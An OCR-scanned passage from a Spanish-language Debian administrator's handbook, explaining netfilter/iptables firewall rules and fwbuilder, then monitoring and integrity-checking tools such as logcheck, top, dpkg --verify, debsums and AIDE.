■  filter  se  refiere  a  las  reglas  de  filtrado  (aceptar,  rechazar  o  ignorar  un  paquete); 

■  nat  se  refiere  a  la  traduction  de  las  direcciones  de  origen  o  destino  y  puertos  de  los  paque¬ 
tes; 

■  mangle  se  refiere  a  otros  cambios  en  los  paquetes  IP  (incluyendo  el  campo  ToS  —  tipo  de 
servicio:  «Type  of  Service»  —  y  opciones); 

■  raw  permite  otras  modificaciones  manuales  en  los  paquetes  antes  de  que  lleguen  al  siste- 
ma  de  seguimiento  de  conexiones. 

Cada  tabla  contiene  listas  de  reglas  llamadas  cadenas.  El  firewall  utiliza  cadenas  estandar  para 
manejar  paquetes  en  funcion  de  circunstancias  predefinidas.  El  administrador  puede  crear  otras 
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cadenas,  que  solo  se  utilizaran  cuando  una  cadena  estandar  haga  referenda  a  ellas  (ya  sea  directa 
o  indirectamente). 

La  tabla  filter  tiene  tres  cadenas  estandar: 

■  INPUT:  se  refiere  a  paquetes  cuyo  destino  es  el  propio  firewall; 

■  OUTPUT:  se  refiere  a  los  paquetes  que  emite  el  firewall; 

■  FORWARD:  se  refiere  a  los  paquetes  que  transitan  a  traves  del  firewall  (que  no  es  ni  su 
origen  ni  su  destino). 

La  tabla  nat  tambien  tiene  tres  cadenas  estandar: 

■  PREROUTING:  para  modificar  los  paquetes  tan  pronto  como  llegan; 

■  POSTROUTING:  para  modificar  los  paquetes  cuando  estan  listos  para  seguir  su  camino; 

■  OUTPUT:  para  modificar  los  paquetes  generados  por  el  propio  firewall. 


PREROUTING 


FORWARD 


POSTROUTING 


> 


Figura  14.1  Como  llamar  a  las  cadenas  de  netfilter 


Cada  cadena  es  una  lista  de  reglas,  cada  regia  es  un  conjunto  de  condiciones  y  una  accion  que 
se  ejecutara  cuando  se  cumplan  las  condiciones.  Cuando  se  procesa  un  paquete,  el  firewall  exa- 
mina  la  cadena  apropiada,  una  regia  tras  otra;  cuando  se  cumplen  las  condiciones  de  una  regia 
«salta»  (de  ahi  la  opcion  -j  en  las  ordenes)  a  la  accion  especificada  para  continuar  el  procesamien- 
to.  Los  comportamientos  mas  comunes  estan  estandarizados  y  existen  acciones  dedicadas  para 
ellos.  Tomar  una  de  estas  acciones  estandar  interrumpe  el  procesamiento  de  la  cadena  ya  que 
el  destino  del  paquete  ya  esta  sellado  (salvo  una  excepcion  que  se  menciona  a  continuacion): 
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volver  A  LOS  cimientos  ICMP  (protocolo  de  mensajes  de  control  de  internet :  «lnternet  Control  Message 
ICMP  Protocol*)  es  el  protocolo  utilizado  para  transmitir  informacion  complementaria  en 
las  comunicaciones.  Permite  probar  la  conectividad  de  red  con  el  programa  ping 
(el  cual  envi'a  un  mensaje  ICMP  de  peticion  de  eco  —  «echo  request*  —  al  que  el 
destinatario  deberi'a  responder  con  un  mensaje  ICMP  de  respuesta  de  eco  —  «echo 
reply*).  Senala  a  un  firewall  rechazando  un  paquete,  indica  un  desbordamiento  en 
un  bufer  de  recepcion,  propone  una  mejor  ruta  para  los  paquetes  siguientes  de  la 
conexion  y  asf  sucesivamente.  Se  definio  este  protocolo  en  varios  documentos  RFC: 
inicialmente  RFC777  y  RFC792  que  fueron  completados  y  extendidos  a  la  brevedad. 

»•  http: //www. faqs.org/rfcs/rf c777.html 
•-  http: //www. faqs.org/rfcs/rf c792.html 

A  modo  de  referencia,  un  bufer  de  recepcion  es  una  pequena  zona  de  memoria  que 
almacena  datos  entre  el  momento  que  llegan  desde  la  red  y  el  momento  en  que 
estos  son  gestionados  por  el  nucleo.  Si  esta  zona  esta  llena,  no  se  pueden  recibir 
nuevos  datos  e  ICMP  senalara  el  problema  para  que  el  emisor  puede  ralentizar  su 
velocidad  de  transferencia  (que  idealmente  deberia  alcanzar  un  equilibrio  despues 
de  algun  tiempo). 

Tenga  en  cuenta  que  aunque  una  red  IPv4  puede  trabajar  sin  ICMP,  ICMPv6  es 
estrictamente  necesario  para  una  red  IPv6  ya  que  combina  varias  funciones  que, 
en  el  mundo  IPv4,  se  encontraban  distribuidas  entre  ICMPv4,  ICMP  ( protocolo  de 
membresla  de  grupo  de  internet :  «lnternet  Group  Membership  Protocol*)  y  ARP 
( protocolo  de  resolucion  de  direcciones :  «Address  Resolution  Protocol*).  ICMPv6 
esta  definido  en  RFC4443. 

»•  http : //www. faqs . org/rf cs/rf c4443 . html 


■  ACCEPT:  permitir  al  paquete  seguir  su  camino; 

■  REJECT:  rechazar  el  paquete  con  un  paquete  de  error  ICMP  (la  opcion  -reject-with  tipo 
de  iptables  permite  seleccionar  el  tipo  de  error); 

■  DROP:  borrar  (ignorar)  el  paquete; 

■  LOG:  registrar  (a  traves  de  syslogd)  un  mensaje  con  una  descripcion  del  paquete;  tenga 
en  cuenta  que  esta  accion  no  interrumpe  el  procesamiento  y  la  ejecucion  de  la  cadena  con- 
tinua  con  la  regia  siguiente,  razon  por  la  que  registrar  los  paquetes  rechazados  necesita 
una  regia  LOG  y  una  regia  REJECT/DROP; 

■  ULOG:  registrar  un  mensaje  a  traves  de  ulogd,  que  puede  adaptarse  mejor  y  mas  eficien- 
temente  que  syslogd  para  manejar  de  grandes  cantidades  de  mensajes;  tenga  en  cuenta 
que  esta  accion,  al  igual  que  LOG,  tambien  continua  el  procesamiento  de  la  siguiente  regia 
en  la  cadena  que  la  llamo; 

■  nombre_de_cadena:  saltar  a  la  cadena  dada  y  evaluar  sus  reglas; 

■  RETURN:  interrumpir  el  procesamiento  de  la  cadena  actual  y  regresar  a  la  cadena  que 
la  llamo;  en  el  caso  de  que  la  cadena  actual  sea  una  estandar  no  hay  cadena  que  la  haya 
llamado,  por  lo  que  en  su  lugar  se  ejecutara  la  accion  predeterminada  (definida  con  la 
opcion  -P  de  iptables); 

■  SN  AT  (unicamente  en  la  tabla  nat:  aplicar  NAT  de  origen  (las  opciones  adicionales  describen 
los  cambios  exactos  que  se  aplicaran); 
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■  DNAT  (unicamente  en  la  tabla  nat):  aplicar  NAT  de  destino  (las  opciones  adicionales  descri- 
ben  los  cambios  exactos  que  se  aplicaran); 

■  MASQUERADE  (unicamente  en  la  tabla  nat:  aplicar  enmascaramiento  (un  caso  especial  de 
NAT  de  origen); 

■  REDIRECT  (unicamente  en  la  tabla  nat:  redirigir  un  paquete  a  un  puerto  determinado 
del  mismo  firewall,  puede  utilizar  esto  para  configurar  un  proxy  web  transparente  que 
funciona  sin  ninguna  configuration  en  el  lado  del  cliente,  dado  que  el  cliente  piensa  que 
se  conecta  con  el  destinatario  mientras  que  las  comunicaciones  realmente  pasan  por  el 
proxy. 

Otras  acciones,  en  particular  las  relativas  a  la  tabla  mangle,  estan  fuera  del  alcance  de  este  texto. 

Podra  encontrar  una  lista  completa  en  iptables  (8)  y  ip6tables  (8). 

14.2.2.  Sintaxis  de  iptables  e  ip6tables 

Los  programas  iptables  e  ip6tables  permiten  manipular  las  tablas,  cadenas  y  reglas.  Su  op- 

cion  -t  tabla  indica  en  que  tabla  operar  (la  tabla  filter  de  forma  predeterminada). 


Ordenes 

La  opcion  -N  cadena  crea  una  nueva  cadena.  La  opcion  -X  cadena  elimina  una  cadena  vacfa  y  sin 
uso.  La  opcion  -A  cadena  regia  anade  una  regia  al  final  de  la  cadena  dada.  La  opcion  -I  cadena 
numeroregla  regia  inserta  una  regia  antes  de  la  regia  con  numero  numero_regla.  La  opcion  -D 
cadena  numero  regla  (o  -D  cadena  regia )  elimina  una  regia  en  una  cadena,  la  primera  sintaxis 
identifica  la  regia  que  se  desea  eliminar  por  su  numero,  mientras  que  la  segunda  la  identifica 
por  su  contenido.  La  opcion  -F  cadena  vacfa  una  cadena  (borra  todas  sus  reglas),  si  no  menciona 
ninguna  cadena,  eliminara  todas  las  reglas  de  la  tabla.  La  opcion  -L  cadena  muestra  las  reglas  de 
la  cadena.  Por  ultimo,  la  opcion  -P  cadena  accion  define  la  accion  predeterminada  o  «polftica» 
para  una  cadena  dada;  tenga  en  cuenta  que  solo  las  cadenas  estandar  puede  tener  dicha  polftica. 


Reglas 

Cada  regia  es  expresada  como  condiciones  -j  accion  opciones_accion.  Si  describe  varias  condi- 
ciones  en  la  misma  regia,  entonces  el  criterio  es  la  conjuncion  (y  logico)  de  las  condiciones,  que 
son  al  menos  tan  restrictivas  como  cada  condicion  individual. 

La  condicion  -p  protocolo  coincide  con  el  campo  de  protocolo  del  paquete  IP.  Los  valores  mas  co- 
munes  son  tcp,  udp,  icmp  e  icmpv6.  Anteponer  la  condicion  con  un  signo  de  exclamation  niega 
la  condicion,  la  cual  se  coincidira  con  «todos  los  paquetes  con  un  protocolo  distinto  al  especifi- 
cado».  Este  mecanismo  de  negation  no  es  especffico  de  la  opcion  -p  y  se  puede  aplicar  a  todas 
las  otras  condiciones  tambien. 

La  condicion  -s  direccion  o  -s  red/mascara  coincide  con  la  direction  de  origen  del  paquete.  Co- 
rrespondientemente,  -d  direccion  o  -dred/mascara  coincide  con  la  direccion  de  destino. 
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La  condicion  -i  interfaz  selecciona  los  paquetes  procedentes  de  la  interfaz  de  red  dada.  -o  inter 
faz  selecciona  los  paquetes  que  salen  a  traves  de  una  interfaz  especifica. 

Hay  condiciones  mas  especificas,  dependiendo  de  las  condiciones  genericas  descriptas  anterior- 
mente.  Por  ejemplo,  puede  completementar  la  condicion  -p  tcp  con  condiciones  sobre  los  puer- 
tos  TCP,  clausulas  como  —source-port  puerto y  -destination-port  puerto. 

La  condicion  —state  estado  coincide  con  el  estado  de  un  paquete  en  una  conexion  (necesitara  el 
modulo  de  nucleo  ipt_connt  rack  para  el  seguimiento  de  conexiones).  El  estado  NEW  describe 
un  paquete  que  inicia  una  nueva  conexion;  ESTABLISHED  coincide  con  paquetes  pertenecientes 
a  una  conexion  ya  existente  y  RELATED  coincide  con  paquetes  iniciando  una  nueva  conexion 
relacionada  con  unaya  existente  (lo  cual  es  util  para  las  conexiones  ftp-data  en  el  modo  «activo» 
del  protocolo  FTP). 

En  la  seccion  anterior  se  enumeran  las  acciones  disponibles,  pero  no  sus  opciones  respectivas. 
Por  ejemplo,  la  accion  LOG  tiene  las  siguientes  opciones: 

■  -log-priority,  con  un  valor  predeterminado  de  warning,  indica  la  severidad  de  los  mensa- 
jes  syslog; 

■  -log-prefix  permite  especificar  un  prefijo  de  texto  para  diferenciar  los  mensajes  registra- 
dos; 

■  — log-tcp-sequence,  —  log-tcp-options  y  —log-ip-options  indican  datos  adicionales  que  se 
integraran  en  el  mensaje:  el  numero  de  secuencia  TCP,  opciones  TCP  y  las  opciones  IP, 
respectivamente. 

La  accion  DNAT  ofrece  la  opcion  —  to-destination  direccion-.puerto  para  indicar  la  nueva  direc- 
cion  IP  y/ o  puerto  de  destino.  De  manera  similar,  S  N  AT  proporciona  — to-source  direccion-.puerto 
para  indicar  la  nueva  direccion  IP  y/o  puerto  de  origen. 

La  accion  REDIRECT  (solo  disponible  is  NAT  esta  dispnible)  ofrece  la  opcion  -to-ports  puerto(s) 
para  indicar  el  puerto  o  rango  de  puertos  al  que  debe  redirigir  los  paquetes. 


14.2.3.  Creadon  de  reglas 

Cada  creacion  de  una  regia  requiere  una  invocacion  de  iptables/ip6tables.  Escribir  estas  or- 
denes  de  forma  manual  puede  ser  tedioso,  por  lo  que  las  llamadas  se  suelen  almacenar  en  un 
script  para  definir  la  misma  configuracion  automaticamente  cada  vez  que  arranque  la  maqui- 
na.  Puede  escribir  este  script  a  mano,  pero  tambien  puede  ser  interesante  prepararlo  con  una 
herramienta  de  alto  nivel  como  fwbuilder. 

#  apt  install  fwbuilder 

El  principio  es  simple.  En  el  primer  paso,  es  necesario  describir  todos  los  elementos  que  inter- 
vendran  en  las  reglas: 

■  el  propio  firewall,  con  sus  interfaces  de  red; 

■  las  redes,  con  sus  rangos  de  direcciones  IP  correspondientes; 
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■  los  servidores; 

■  los  puertos  pertenecientes  a  los  servicios  alojados  en  los  servidores. 

Luego  puede  crear  las  reglas  simplemente  arrastrando  y  soltando  acciones  en  los  objetos.  Unos 
cuantos  menus  contextuales  pueden  cambiar  la  condicion  (negarla,  por  ejemplo).  A  continua- 
cion,  debera  elegir  la  accion  y  configurarla. 

En  cuanto  a  IPv6,  puede  crear  dos  conjuntos  de  reglas  diferentes  para  IPv4  e  IPv6,  o  crear  solo 
una  y  dejar  que  fwbuilde  r  traduzca  las  reglas  segun  las  direcciones  asignadas  a  los  objetos. 


0  B  I 


1  Fte 
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Filter: 

Library: 

Object 


Firewall  Builder  -  [gnurandal+placard.fwb] 
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Figura  14.2  Ventana  principal  de  fwbuilder 


Luego  fwbuilder  puede  generar  un  script  de  configuracion  del  firewall  segun  las  reglas  que 
definio.  Su  arquitectura  modular  le  da  la  capacidad  para  generar  scripts  dirigidos  a  diferentes 
sistemas  (iptables  para  Linux,  ipf  para  LreeBSDy  pf  para  OpenBSD). 


14.2.4.  Instalacion  de  las  reglas  en  cada  arranque 

En  otros  casos,  la  forma  recomendada  es  registrar  el  script  de  configuracion  en  una  directiva  up 
del  archivo  /etc/network/interfaces.  En  el  siguiente  ejemplo,  el  script  esta  guardado  como 
/usr/local/etc/arrakis . fw. 
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Ejemplo  14.1  archivo  interfaces  llamando  al  script  del  firewall 


auto  ethO 

iface  eth0  inet  static 
address  192.168.0.1 
network  192.168.0.0 
netmask  255.255.255.0 
broadcast  192.168.0.255 
up  /usr/local/etc/arrakis . fw 


Esto  obviamente  asume  que  se  esta  utilizando  ifupdown  para  configurar  las  interfaces  de  red.  Si 
se  esta  utilizando  alguna  otra  cosa  (como  NetrworkManager  o  systemd-networkd),  entonces  se  debe 
consultar  la  documentacion  respectiva  para  averiguar  como  ejecutar  un  script  despues  de  que 
se  levante  la  interfaz  de  red. 


14.3.  Supervision:  prevencion,  deteccion,  disuasion 

La  monitorizacion  es  una  parte  integral  de  cualquier  politica  de  seguridad  por  varias  razones. 
Entre  ellas,  que  el  objetivo  de  la  seguridad  generalmente  no  se  limita  a  garantizar  la  confiden- 
cialidad  de  los  datos,  sino  que  tambien  incluye  garantizar  la  disponibilidad  de  los  servicios.  Por 
tanto,  es  imprescindible  comprobar  que  todo  funciona  como  se  espera  y  detectar  de  manera 
oportuna  cualquier  desvio  en  la  conducta  o  cambio  en  la  calidad  de  los  servicios  prestados.  Mo- 
nitorizar  la  actividad  puede  ayudar  con  la  deteccion  de  intentos  de  intrusion  y  permitir  una 
reaccion  rapida  antes  que  ocurran  graves  consecuencias.  Esta  seccion  revisa  algunas  de  las  he- 
rramientas  que  puede  utilizar  para  monitorizar  varios  aspectos  de  un  sistema  Debian.  Como  tal, 
esto  completa  Seccion  12.4,  «Monitorizacion»  pagina  367. 


14.3.1.  Monitorizacion  de  los  registros  con  logcheck 

El  programa  logcheck  monitoriza  los  archivos  de  registro,  de  forma  predeterminada,  cada  ho- 
ra.  Envia  los  mensajes  de  registro  inusuales  en  correos  electronicos  al  administrador  para  su 
posterior  analisis. 

La  lista  de  archivos  a  monitorizar  se  almacena  en  /etc/logcheck/logcheck.  logfiles;  los  va- 
lores  predeterminados  funcionan  bien  si  no  modified  completamente  el  archivo  /etc/  rsyslog  . 
conf. 

logcheck  puede  funcionar  en  una  de  tres  modalidades  mas  o  menos  detalladas:  paranoid,  server 
y  workstation.  El  primero  es  muy  detallado  y,  probablemente,  deberia  restringirlo  a  servidores 
especificos  como  firewalls.  El  segundo  (y  predeterminado)  es  el  modo  recomendado  para  la  ma- 
yoria  de  los  servidores.  El  ultimo  esta  disenado  para  estaciones  de  trabajo  y  es  aun  mas  conciso 
(filtra  la  mayoria  de  los  mensajes). 
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En  los  tres  casos,  probablemente  deberfa  personalizar  logcheck  para  excluir  algunos  mensajes 
adicionales  (dependiendo  de  los  servicios  instalados)  a  menos  que  el  administrador  realmente 
desee  recibir  a  cada  hora  correos  electronicos  enormes  y  poco  interesantes.  Dado  que  el  meca- 
nismo  de  seleccion  de  mensajes  es  bastante  complejo,  /us r/share/doc/logcheck- database/ 
README .  logcheck- database  .gz  es  una  lectura  —  aunque  diffcil  —  necesaria. 

Las  reglas  aplicadas  se  puede  dividir  en  varios  tipos: 

■  aquellas  que  clasifican  un  mensaje  como  un  intento  de  intrusion  —  «cracking»  (almace- 
nado  en  un  archivo  en  el  directorio  /etc/logcheck/cracking .  d/); 

■  aquellas  que  cancelan  esta  clasificacion  (/etc/logcheck/cracking  .ignore. d/); 

■  aquellos  que  clasifican  un  mensaje  como  una  alerta  de  seguridad  (/etc/logcheck/ 
violations . d/); 

■  aquellos  que  cancelan  esta  clasificacion  (/etc/logcheck/violations  .  ignore.d/); 

■  finalmente,  aquellas  que  son  aplicadas  a  los  mensajes  restantes  (considerados  como  even- 
tos  del  sistema). 


PRECAUCION 

Ignorar  un  mensaje 


Cualquier  mensaje  marcado  como  un  intento  de  intrusion  o  una  alerta  de  seguri¬ 
dad  (siguiendo  una  regia  almacenada  en  el  archivo  /etc/logcheck/violations. 
d/miarchivo)  solo  puede  ser  ignorado  por  una  regia  en  el  archivo  /etc/logcheck/ 
violations .ignore . d/miarchivo  o  /etc/logcheck/violations . ignore . d/ 
miarchivo-  extension. 


Siempre  se  indicara  un  evento  de  sistema  a  menos  que  una  regia  en  alguno  de  los  directorios 
en/etc/logcheck/ignore.d . {paranoid, server, workstation}/ indiqueque el evento  debe 
ser  ignorado.  Por  supuesto,  solo  se  tomaran  en  cuenta  los  directorios  que  corresponden  a  los 
niveles  de  detalle  igual  o  mayor  al  modo  de  funcionamiento  seleccionado. 


14.3.2.  Monitorizacion  de  actividad 
En  tiempo  real 

top  es  una  herramienta  interactiva  que  muestra  una  lista  de  los  procesos  en  ejecucion.  La  or- 
denacion  predeterminada  es  segun  la  cantidad  de  procesador  utilizada  y  se  puede  obtener  me- 
diante  la  tecla  P.  Entre  otros  criterios  de  ordenacion  podemos  encontrar:  segun  la  cantidad  de 
memoria  ocupada  (tecla  M),  segun  el  tiempo  total  de  uso  de  procesador  (tecla  T)  y  segun  el  iden- 
tificador  de  proceso  (tecla  N).  La  tecla  k  permite  matar  un  proceso  ingresando  su  identificador 
de  proceso.  La  tecla  r  permite  ejecutar  renice  sobre  un  proceso,  es  decir:  cambiar  su  prioridad. 

Cuando  el  sistema  aparenta  estar  sobrecargado,  top  es  una  herramienta  excelente  para  ver  que 
procesos  estan  compitiendo  por  el  tiempo  de  procesador  o  consumiendo  demasiada  memoria. 
En  particular,  a  menudo  es  interesante  comprobar  si  los  procesos  que  estan  consumiendo  los 
recursos  se  corresponden  con  los  servicios  reales  que  la  maquina  debe  albergar.  Por  ejemplo, 
un  proceso  desconocido  ejecutandose  como  el  usuario  www-data  deberfa  llamar  su  atencion  y 
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ser  investigado  puesto  que  posiblemente  sea  algun  tipo  de  software  instalado  y  ejecutado  en  el 
sistema  a  traves  de  una  vulnerabilidad  en  una  aplicacion  web. 

top  es  una  herramienta  muy  flexible  y  su  pagina  de  manual  detalla  como  personalizar  su  pre- 
sentacion  y  adaptarla  a  las  necesidades  y  habitos  particulares. 

La  herramienta  grafica  gnome  -  system  -  monito  r  es  similar  al  programa  top  y  proporciona  apro- 
ximandamente  las  mismas  caracteristicas. 


Historial 

La  carga  del  procesador,  el  trafico  de  red  y  el  espacio  libre  en  disco  son  datos  que  varian  cons- 
tantemente.  A  menudo  es  util  disponer  de  un  historial  con  su  evolucion  para  determinar  como 
se  utiliza  exactamente  la  maquina. 

Existen  muchas  herramientas  dedicadas  para  esta  tarea.  La  mayoria  puede  obtener  datos  a  tra¬ 
ves  de  SNMP  ( protocolo  simple  de  gestion  de  red:  « Simple  Network  Management  Protocol)))  para 
centralizar  esta  informacion.  Un  beneficio  adicional  es  que  permite  recoger  datos  de  elementos 
de  red  que  pueden  no  ser  equipos  de  proposito  general,  tal  como  switches  o  routers  dedicados. 

Este  libro  habla  de  Munin  con  cierto  detalle  (ver  la  Seccion  12.4.1,  «Configuracion  de  Munin» 
pagina  368  como  parte  del  Capitulo  12:  “Administracion  avanzada”  pagina  322.  Debian  tambien 
proporciona  una  herramienta  similar:  cacti.  Su  despliegue  es  algo  mas  complejo  puesto  que  se  ba- 
sa  exclusivamente  en  SNMP.  A  pesar  de  que  dispone  de  una  interfaz  web,  entender  los  conceptos 
involucrados  en  la  configuracion  requiere  de  todas  formas  un  poco  de  esfuerzo.  Deberia  consi- 
derar  como  prerequisite  leer  la  documentacion  HTML  (/usr/share/doc/cacti/html/index. 
html). 


ALTERNATIVA  mrtg  (contenido  en  el  paquete  del  mismo  nombre)  es  una  herramienta  mas  antigua. 
mr^.g  A  pesar  de  algunas  asperezas,  puede  agrupar  datos  historicos  y  mostrarlos  como 
graficos.  Incluye  algunos  scripts  para  recolectar  los  datos  monitorizados  con  mas 
frecuencia  como  la  carga  de  procesador,  el  trafico  de  red,  el  numero  de  impresiones 
de  una  pagina  web,  etc. 

Los  paquetes  mrtg-contrib  y  mrtgutils  contienen  scripts  de  ejemplo  que  puede  uti- 
lizar  directamente. 


14.3.3.  Deteccion  de  cambios 

Una  vez  que  el  sistema  esta  instalado  y  configurado,  dejando  al  margen  las  actualizaciones  de  se- 
guridad,  normalmente  no  hay  razon  para  que  los  archivos  y  directories  cambien  con  excepcion 
de  los  datos.  Por  lo  tanto,  es  interesante  asegurarse  que  efectivamente  los  archivos  no  cambian: 
deberia  investigar  cualquier  cambio  inesperado.  Esta  seccion  presenta  algunas  herramientas 
capaces  de  monitorizar  archivos  y  advertir  al  administrador  en  caso  de  que  se  produzca  algun 
cambio  inesperado  (o  simplemente  enumerar  estos  cambios). 
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Auditoria  de  paquetes  mediante  dpkg  --veri  fy 


YENDO  MAS  ALLA 

Proteccion  contra  los 
cambios  de  los 
desarrolladores  originales 


dpkg  -  -verify  es  util  para  detectar  cambios  en  los  archivos  que  provienen  de  un 
paquete  de  Debian,  pero  es  inutil  si  el  propio  paquete  ha  sido  comprometido,  por 
ejemplo  si  se  comprometio  la  replica  Debian.  Protegerse  de  este  tipo  de  ataques 
implica  utilizar  del  sistema  de  verificacion  de  firma  digital  de  APT  (revise  la  Seccion 
6.5,  «Comprobacion  de  la  autenticidad  de  un  paquete»  pagina  128)  y  solo  instalar 
paquetes  de  un  origen  certificado. 


dpkg  -  -verify  (o  dpkg  -V)  es  una  orden  interesante,  puesto  que  permite  averiguar  que  ar¬ 
chivos  han  sido  modificados  (potencialmente  por  un  atacante).  Sin  embargo  esta  informacion 
se  tiene  que  tomar  con  precaucion.  Para  hacer  su  trabajo,  dpkg  utiliza  las  sumas  de  verifi¬ 
cacion  (checksums)  almacenadas  en  el  disco  duro  (se  pueden  encontrar  en  /var/lib/dpkg/ 
info/pac/cage.md5sums);  un  atacante  minucioso  podria  actualizar  estos  archivos  de  forma  que 
contengan  las  nuevas  sumas  de  verificacion  de  los  archivos  modificados. 


VOLVER  A  LOS  CIMIENTOS 

Huella  digital  de  un 
archivo 


Como  recordatorio:  una  huella  digital  es  un  valor,  a  menudo  un  numero  (aunque 
pueda  estar  en  notacion  hexadecimal),  que  contiene  una  especie  de  firma  de  los  con- 
tenidos  de  un  archivo.  Se  calcula  esta  firma  mediante  un  algoritmo  (MD5  o  SHA1 
son  ejemplos  muy  conocidos)  que  mas  o  menos  garantizan  que  incluso  el  cambio 
mas  pequeno  en  el  contenido  de  un  archivo  implica  un  cambio  en  su  huella  digital; 
esto  es  conocido  como  «efecto  avalancha».  Esto  permite  que  una  simple  huella  di¬ 
gital  numerica  sirva  como  patron  para  comprobar  si  se  altero  el  contenido  de  un 
archivo.  Estos  algoritmos  no  son  reversibles;  en  otras  palabra,  para  la  mayoria  de 
ellos,  conocer  la  huella  digital  no  permite  averiguar  los  contenidos  correspondien- 
tes.  Los  avances  matematicos  recientes  parece  que  debilitan  la  verdad  absoluta  de 
estos  principios,  pero  por  el  momento  su  uso  no  se  ha  puesto  en  cueston,  ya  que 
crear  distintos  contenidos  que  produzcan  la  misma  huella  todavia  parece  una  tarea 
muy  complicada. 


Le  comando  dpkg  -V  comprueba  todos  los  paquetes  instalados  e  imprime  una  linea  por  cada 
archivo  en  el  que  falle  el  test  de  integridad.  El  formato  de  salida  es  el  mismo  que  el  del  coman¬ 
do  rpm  -  V,  conde  cada  caracter  corresponde  a  una  comprobacion  sobre  un  metadato  especifico. 
Desgraciadamente  dpkg  no  almacena  todos  los  metadatos  requeridos  para  todas  las  comproba- 
ciones,  y  por  lo  tanto  imprimira  signos  de  interrogacion  para  la  mayor  parte  de  los  mismos.  En 
la  actualidad  unicamente  el  test  de  suma  de  verificacion  podria  impirmir  un  «  5  »  (en  la  tercera 
columna)  en  caso  de  no  pasar  la  comprobacion. 

#  dpkg  -V 

??5??????  /lib/systemd/system/ssh . service 
??5?????7  c  /etc/libvirt/qemu/networks/default . xml 
??5??????  c  /etc/lvm/lvm . conf 
??5??????  c  /etc/salt/roster 

En  el  ejemplo  anterior,  dpkg  muestra  un  cambio  realizado  por  el  administrador  en  el  archivo 
de  servicio  de  SSH  contenido  en  el  paquete,  en  lugar  de  modificar  la  configuracion  mediante  un 
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archivo  /etc/systemd/system/ssh  .  service  (almacenado  en  /etc  como  deberfan  estar  todos 
los  archivos  de  configuracion).  dpkg  tambien  muestra  varios  archivos  de  confirugacion  (identi- 
ficados  con  la  letra  «  c  »  en  el  segundo  campo)  que  han  sido  modificados  (de  forma  legftima). 


Auditoria  de  paquetes:  debsums  y  sus  llmites 

deb  sums  es  el  antecesor  de  dpkg  -Vy  por  lo  tanto  esta  practicamente  obsoleto.Tienelas  mismas 
restricciones  que  dpkg.  Afortunadamente,  algunas  de  sus  limitaciones  pueden  ser  obviadas  (lo 
que  no  es  posible  con  dpkg). 

Como  no  es  posible  confiar  en  los  archivos  almacenadados  en  el  disco,  debsums  permite  efectuar 
sus  comprobaciones  a  partir  de  los  archivos  .deb  ademas  de  a  partir  de  la  base  de  datos  de  dpkg. 
Para  descargar  los  archivos  .  deb  confiables  de  todos  los  paquetes  instalados,  se  pueden  utilizar 
las  descargas  autenticadas  de  APT.  Lo  malo  es  que  esta  operacion  puede  ser  lenta  y  tediosa  y, 
por  lo  tanto,  no  debe  considerarse  como  una  tecnica  proactiva  a  utilizar  de  forma  regular. 

#  apt-get  --reinstall  -d  install  'grep-status  -e  'Status:  install  ok  installed'  -n  -s 

Package' 

[  ...  1 

#  debsums  -p  /var/cache/apt/archives  - -generate=all 

Sepa  que  este  ejemplo  utiliza  el  programa  g  rep  -  status  del  paquete  dctrl- tools  que  no  se  instala 
de  forma  predeterminada. 


Monitorizacion  de  archivos:  AIDE 

La  herramienta  AIDE  ( entomo  avanzado  de  deteccion  de  intrusion:  «Advanced  Intrusion  Detection 
Environment)))  permite  comprobar  la  integridad  de  los  archivos  y  detectar  cualquier  cambio 
frente  a  una  imagen  guardada  previamente  del  sistema  valido.  Se  almacena  esta  imagen  como 
una  base  de  datos  (/var/lib/aide/aide  .db)  que  contiene  la  informacion  relevante  de  todos 
los  archivos  del  sistema  (huella  digital,  permisos,  marcas  temporales,  etc.).  Se  inicializa  esta  base 
de  datos  con  aideinit;  luego  se  la  utiliza  diariamente  (por  el  script  /etc/cron  .daily/aide) 
para  comprobar  que  nada  importante  haya  cambiado.  Cuando  se  detectan  cambios,  AIDE  los 
almacena  en  archivos  de  registro  (/va  r/log/aide/* .  Log)  y  envia  lo  encontrado  en  un  email  al 
administrador. 


EN  LA  PRACTICA  Debido  a  que  AIDE  utiliza  una  base  de  datos  local  para  comparar  el  estado  de  los 

Proteccion  de  la  base  de  archivos,  la  validez  de  sus  resultados  esta  asociada  directamente  a  la  validez  de  la 

datos  base  de  datos.  Si  un  atacante  consigue  obtener  permisos  de  administrador  en  un 
sistema  comprometido,  podra  reemplazar  la  base  de  datos  y  cubrir  sus  huellas.  Una 
posible  solucion  podria  ser  almacenar  la  base  de  datos  de  referencia  en  un  medio 
de  almacenamiento  de  solo  lectura. 


Puede  utilizar  numerosas  opciones  en  el  archivo  /etc/default/aide  para  configurar  el  com- 
portamiento  del  paquete  aide.  Se  almacena  la  configuracion  de  AIDE  en  si  en  /etc/aide/aide . 
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conf  y  /etc/aide/aide .  conf  .d/  (de  hecho,  solo  update-aide .  conf  utiliza  estos  archivos  pa¬ 
ra  generar  /va r/lib/aide/aide  .conf  .autogene rated). La configuracion indica que propieda- 
des  se  deben  comprobar.  Por  ejemplo,  el  contenidos  de  los  archivos  de  registro  cambia  continua- 
mente,  y  se  puede  ignorar  estos  cambios  mientras  que  los  permisos  de  los  archivos  permanezcan 
inalterados,  pero  tanto  el  contenido  como  los  permisos  de  los  programas  ejecutables  debe  per- 
manecer  constante.  Aunque  no  es  excesivamente  compleja,  la  sintaxis  de  la  configuracion  no  es 
del  todo  intuitivay,  por  lo  tanto,  recomendamos  leer  su  pagina  de  manual  aide .  conf  (5). 

Cada  dia  se  genera  una  nueva  version  de  la  base  de  datos  en  /va  r/lib/aide/aide .  db .  new;  si 
todos  los  cambios  registrados  son  legitimos,  puede  utilizarla  para  reemplazar  la  base  de  datos 
de  referencia. 


ALTERNATIVA  Tripwire  es  muy  similar  a  AIDE;  incluso  la  sintaxis  del  archivo  de  configuracion  es 
Tripwire  y  Samhain  practicamente  la  misma.  La  ventaja  principal  de  tripwire  es  un  mecanismo  para 
firmar  el  archivo  de  configuracion,  de  forma  que  un  atacante  no  pueda  hacer  que 
apunte  a  una  version  diferente  de  la  base  de  datos  de  referencia. 

Samhain  tambien  ofrece  caracteristicas  similares,  asi  como  algunas  funciones  para 
ayudar  a  detectar  «rootkits»  (revise  el  recuadro  «Los  paquetes  checksecurity  y 
chkrootkit/ rkhunter»  pagina  41  I).  Tambien  puede  desplegarlo  de  forma  global  en 
una  red  y  guardar  sus  trazas  en  un  servidor  central  (con  su  firma  correspondiente). 


VISTA  RAPIDO  El  primero  de  estos  paquetes  contiene  varios  scripts  pequenos  que  realizan  com- 

